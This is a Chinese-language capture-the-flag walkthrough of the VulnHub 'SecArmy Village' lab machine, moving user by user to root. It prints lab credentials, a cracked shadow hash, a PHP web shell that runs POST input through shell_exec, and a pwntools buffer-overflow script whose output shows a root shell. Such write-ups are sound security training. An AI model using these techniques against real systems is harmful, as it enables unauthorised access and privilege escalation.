SECARMY VILLAGE: GRAYHAT CONFERENCE

虛擬機器地址：https://download.vulnhub.com/secarmyvillage/SECARMY-VILLAGE-OSCP-GIVEAWAY.ova

主機探測、埠掃描這裡就省略了，每次都寫顯得冗餘了。

flag1

訪問80埠，沒有什麼有價值資訊，先dirb跑一下目錄

---- Scanning URL: http://192.168.132.141/ ----
==> DIRECTORY: http://192.168.132.141/anon/                                                                           
+ http://192.168.132.141/index.html (CODE:200|SIZE:267)                                                               
==> DIRECTORY: http://192.168.132.141/javascript/                                                                     
+ http://192.168.132.141/server-status (CODE:403|SIZE:280)                                                            

進入到anon目錄，檢視頁面元素，獲取到第一個使用者口令，ssh登入獲取到flag1。

Welcome to the hidden directory! <br>
<br>
Here are your credentials to make your way into the machine!
<br>
<br>
<font color="white">uno:luc10r4m0n</font>

kali@kali:~$ ssh uno@192.168.132.141
The authenticity of host '192.168.132.141 (192.168.132.141)' can't be established.
ECDSA key fingerprint is SHA256:+KBxMeqxgG6NngNoJwwS2riM4d1vvmOUVunnIyNS8I8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.132.141' (ECDSA) to the list of known hosts.
uno@192.168.132.141's password: 
 ________  _______   ________  ________  ________  _____ ______       ___    ___ 
|\   ____\|\  ___ \ |\   ____\|\   __  \|\   __  \|\   _ \  _   \    |\  \  /  /|
\ \  \___|\ \   __/|\ \  \___|\ \  \|\  \ \  \|\  \ \  \\\__\ \  \   \ \  \/  / /
 \ \_____  \ \  \_|/_\ \  \    \ \   __  \ \   _  _\ \  \\|__| \  \   \ \    / / 
  \|____|\  \ \  \_|\ \ \  \____\ \  \ \  \ \  \\  \\ \  \    \ \  \   \/  /  /  
    ____\_\  \ \_______\ \_______\ \__\ \__\ \__\\ _\\ \__\    \ \__\__/  / /    
   |\_________\|_______|\|_______|\|__|\|__|\|__|\|__|\|__|     \|__|\___/ /     
   \|_________|                                                     \|___|/      
                                                                                 
                                                                                 
 ___      ___ ___  ___       ___       ________  ________  _______               
|\  \    /  /|\  \|\  \     |\  \     |\   __  \|\   ____\|\  ___ \              
\ \  \  /  / | \  \ \  \    \ \  \    \ \  \|\  \ \  \___|\ \   __/|             
 \ \  \/  / / \ \  \ \  \    \ \  \    \ \   __  \ \  \  __\ \  \_|/__           
  \ \    / /   \ \  \ \  \____\ \  \____\ \  \ \  \ \  \|\  \ \  \_|\ \          
   \ \__/ /     \ \__\ \_______\ \_______\ \__\ \__\ \_______\ \_______\         
    \|__|/       \|__|\|_______|\|_______|\|__|\|__|\|_______|\|_______|         
                                                                                 
                                                                                 
WELCOME TO THE SECARMY OSCP GIVEAWAY MACHINE!,

https://secarmy.org/village/

THIS MACHINE HAS BEEN MADE AS PART OF THE SECARMY VILLAGE 
EVENT AND IS SPONSOSRED BY OUR GENEROUS SPONSOR OFFENSIVE
SECURITY. YOU ARE REQUIRED TO COMPLETE 10 TASKS IN ORDER TO 
GET THE ROOT FLAG. MAKE SURE THAT YOU JOIN OUR DISCORD SERVER
(bit.ly/joinsecarmy) IN ORDER TO SUBMIT THE FLAG AS WELL AS 
FOR SOLVING YOUR PROBLEMS OR QUERIES...

GOODLUCK!
uno@svos:~$ ls
flag1.txt  readme.txt
uno@svos:~$ cat flag1.txt
Congratulations!
Here's your first flag segment: flag1{fb9e88}

flag2

這裡給了提示檔案readme.txt，得到第二個使用者密碼。

uno@svos:~$ cat readme.txt 
Head over to the second user!
You surely can guess the username , the password will be:
4b3l4rd0fru705
uno@svos:~$ cat /etc/passwd|grep bin/bash
root:x:0:0:root:/root:/bin/bash
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
cero:x:1000:1000:,,,:/home/cero:/bin/bash

使用者名稱為dos，利用上述密碼切換到該使用者後得到提示檔案readme.txt

uno@svos:~$ su - dos
Password: 
dos@svos:~$ ls
1337.txt  files  readme.txt
dos@svos:~$ cat readme.txt 
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a

在files目錄中找到相應檔案，又把我們帶到file3131.txt

dos@svos:~$ grep -R a8211ac1853a1235d48829414626512a ./files/
./files/file4444.txt:a8211ac1853a1235d48829414626512a
dos@svos:~$ cat files/file4444.txt 
.......
a8211ac1853a1235d48829414626512a
Look inside file3131.txt

在file3131.txt檔案最後有這樣一串字元

UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA

BASE64解密第一行，發現頭兩個字元是PK，於是聯想到這是一個zip檔案，於是這裡寫了個簡單指令碼將它重寫為一個為1.zip。

#!/usr/bin/python3
import base64

codes = '''UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA'''

with open('1.zip', 'wb') as f:
    for code in codes.split('\n'):
        f.write(base64.b64decode(code))

dos@svos:~$ unzip 1.zip 
Archive:  1.zip
   creating: challenge2/
  inflating: challenge2/flag2.txt    
  inflating: challenge2/todo.txt 

dos@svos:~/challenge2$ cat flag2.txt 
Congratulations!

Here's your second flag segment: flag2{624a21}
dos@svos:~/challenge2$ cat todo.txt 
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

flag3

直接nc本地1337埠，輸入該token，獲取到第三個使用者密碼。

dos@svos:~/challenge2$ cat todo.txt 
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
dos@svos:~/challenge2$ nc 127.0.0.1 1337

 Welcome to SVOS Password Recovery Facility!
 Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

 Here's your login credentials for the third user tres:r4f43l71n4j3r0 
dos@svos:~/challenge2$ su - tres
Password: 
tres@svos:~$ ls
a.out  flag3.txt  readme.txt  secarmy-village
tres@svos:~$ cat flag3.txt 
Congratulations! Here's your third flag segment: flag3{ac66cf}
tres@svos:~$ cat readme.txt 
A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user's credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU

flag4

按照提示，字串檢視secarmy-village發現該程式被upx加殼，先脫殼，再字串檢視找到使用者cuatro密碼，成功獲取

kali@kali:~$ upx -d secarmy-village 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     53496 <-     20348   38.04%   linux/amd64   secarmy-village

Unpacked 1 file.
kali@kali:~$ strings secarmy-village|grep cuatro
Here's the credentials for the fourth user cuatro:p3dr00l1v4r3z

cuatro@svos:~$ cat flag4.txt
Congratulations, here's your 4th flag segment: flag4{1d6b06}

flag5

cuatro@svos:~$ cat todo.txt 
We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.

按照提示，在目錄/var/www/html/justanothergallery/qr中找到一堆二維碼，很明顯，資訊就在這些二維碼中，寫了一個小指令碼，用的是pyzbar^[1]，得到了使用者cinco的密碼,得到了flag5。

#!/usr/bin/python3
import pyzbar.pyzbar as pyzbar
from PIL import Image
for number in range(0,68):
    fileName = 'qr/image-{}.png'.format(number)
    img = Image.open(fileName)
    barcodes = pyzbar.decode(img)
    for barcode in barcodes:
        barcodeData = barcode.data.decode('utf-8')
        print(barcodeData)

kali@kali:~/Desktop$ python3 test.py |grep cinco
cinco:ruy70m35
cinco@svos:~$ cat flag5.txt 
Congratulations! Here's your 5th flag segment: flag5{b1e870}

flag6

檢視提示，查詢cinco所有的檔案，找到密碼檔案，按照hint提示破解得到使用者seis密碼，成功得到flag6。

cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$ find / -user cinco 2>/dev/null
/sys/fs/cgroup/systemd/user.slice/user-1005.slice/user@1005.service
/sys/fs/cgroup/systemd/user.slice/user-1005.slice/user@1005.service/cgroup.procs
......
/cincos-secrets
/cincos-secrets/shadow.bak
/cincos-secrets/hint.txt
cinco@svos:~$ cat /cincos-secrets/hint.txt 
we will, we will, ROCKYOU..!!!
cinco@svos:~$ cat /cincos-secrets/shadow.bak 
daemon:*:18380:0:99999:7:::
......
seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::

$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:Hogwarts

cinco@svos:~$ su - seis
Password: 
seis@svos:~$ cat flag6.txt 
Congratulations! Here's your 6th flag segment: flag6{779a25}

flag7

進入提示目錄

seis@svos:/var/www/html/shellcmsdashboard$ ls -all
total 24
drwxrwxrwx 2 root     root 4096 Nov 13 20:44 .
drwxr-xr-x 5 root     root 4096 Oct  8 17:51 ..
-rwxrwxrwx 1 root     root 1459 Oct  1 17:57 aabbzzee.php
-rwxrwxrwx 1 root     root 1546 Oct 18 15:02 index.php
-rwx-wx-wx 1 www-data root   48 Oct  8 17:54 readme9213.txt
-rwxrwxrwx 1 root     root   58 Oct  1 17:37 robots.txt

發現readme9213.txt需要www-data才能檢視，繼續檢視aabbzzee.php

<?php
    if(isset($_POST['comm']))
    {
        $cmd = $_POST['comm'];
        echo "<center>";
        echo shell_exec($cmd);
        echo"</center>";
    }
?>

利用該php執行命令成功讀取txt文件資訊，獲取到使用者siete密碼6u1l3rm0p3n473。

siete@svos:~$ ls
flag7.txt  hint.txt  key.txt  message.txt  mighthelp.go  password.zip
siete@svos:~$ cat flag7.txt
Congratulations!
Here's your 7th flag segment: flag7{d5c26a}

flag8

siete@svos:~$ cat hint.txt 
Base 10 and Base 256 result in Base 256!
siete@svos:~$ cat key.txt 
x
siete@svos:~$ cat message.txt 
[11 29 27 25 10 21 1 0 23 10 17 12 13 8]
siete@svos:~$ cat mighthelp.go 
package main import(
        "fmt" ) func main() {
        var chars =[]byte{}
        str1 := string(chars)
        fmt.println(str1)
}

從提示上看，base10和base256進行and怎麼能還是base256了？256在16進位制中表示為00，那麼只能是xor操作了，於是這裡將key與陣列異或得到password.zip的解壓密碼secarmyxoritup。

>>> ''.join(chr(ord('x')^key) for key in [11,29,27,25,10,21,1,0,23,10,17,12,13,8])
'secarmyxoritup'

得到下一個使用者ocho的密碼m0d3570v1ll454n4，得到flag8。

ocho@svos:~$ cat flag8.txt 
Congratulations!
Here's your 8th flag segment: flag8{5bcf53}

flag9

用wireshark分析keyboard.pcapng，找到關鍵資料包

導成txt短文，找到了關鍵字元mjwfr?2b6j3a5fx/，結合短文含義，使用Keyboard Shift Decoder^[2]進行解碼，得到使用者nueve的密碼355u4z4rc0，從而得到flag9。

QWERTY is a keyboard design for Latin-script alphabets. The name comes from the order of the first six keys on the top left letter row of the keyboard. The QWERTY design is based on a layout created for the Sholes and Glidden typewriter and sold to E. Remington and Sons in 1873. Why was the QWERTY 
......
The striker lockup came when a typist quickly typed a succession of letters on the same type bars and the strikers were adjacent to each other. There was a higher possibility for the keys to become jammed. READING IS NOT IMPORTANT, HERE IS WHAT YOU WANT: "mjwfr?2b6j3a5fx/" if the sequence was not perfectly timed. The theory presents that Sholes redesigned the type bar so as to separate the most common sequences of letters: âthâ, âheâ and others from causing a jam.
......

nueve@svos:~$ cat flag9.txt 
Congratulations!
Here's your 9th flag segment: flag9{689d3e}

flag10

反編譯使用者目錄下程式orangutan。

undefined8 main(void)

{
  char local_28 [24];
  long local_10;
  
  local_10 = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("hello pwner ");
  puts("pwnme if u can ;) ");
  gets(local_28);
  if (local_10 == 0xcafebabe) {
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh",(char **)0x0);
  }
  return 0;
}

可以看到可以通過gets修改local_10為0xcafebabe來實現獲取root shell，具體如下：

1. 遠端啟動orangutan

nueve@svos:~$ socat TCP-LISTEN:8000 EXEC:./orangutan

2. 本地pwn

kali@kali:~$ cat test.py 
from pwn import *
offset = b"A" * 24
secret= b"\xbe\xba\xfe\xca"
payload = offset + secret
io = remote('192.168.132.141', 8000)
print(io.recvline())
print(io.recvline())
io.sendline(payload)
io.interactive()
kali@kali:~$ python3 test.py 
[+] Opening connection to 192.168.132.141 on port 8000: Done
b'hello pwner \n'
b'pwnme if u can ;) \n'
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root),1009(nueve)
$ pwd
/home/nueve
$ cd /root
$ ls -all
total 76
drwx------  8 root root  4096 Oct 22 09:22 .
drwxr-xr-x 25 root root  4096 Oct 18 14:42 ..
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  4 root root  4096 Oct  7 14:09 .cache
drwx------  2 root root  4096 Sep 25 11:48 .elinks
drwxr-xr-x  3 root root  4096 Oct  5 08:39 .gem
drwx------  3 root root  4096 Oct  7 14:09 .gnupg
drwxr-xr-x  3 root root  4096 Sep 22 11:21 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rwxrwxr-x  1 tres tres    73 Sep 27 14:23 pw.sh
-rw-r--r--  1 root root   200 Oct 20 17:48 root.txt
-rw-r--r--  1 root root    66 Sep 27 14:31 .selected_editor
drwx------  2 root root  4096 Sep 22 11:19 .ssh
-rwxr-xr-x  1 root root 18792 Oct 21 17:49 svos_password_recovery
-rw-------  1 root root  1250 Oct  7 14:31 .viminfo
$ cat root.txt
Congratulations!!!

You have finally completed the SECARMY OSCP Giveaway Machine

Here's your final flag segment: flag10{33c9661bfd}

Head over to https://secarmyvillage.ml/ for submitting the flags!

參考

• [1] https://blog.csdn.net/qq_39903576/article/details/86710862
• [2] https://www.dcode.fr/keyboard-shift-cipher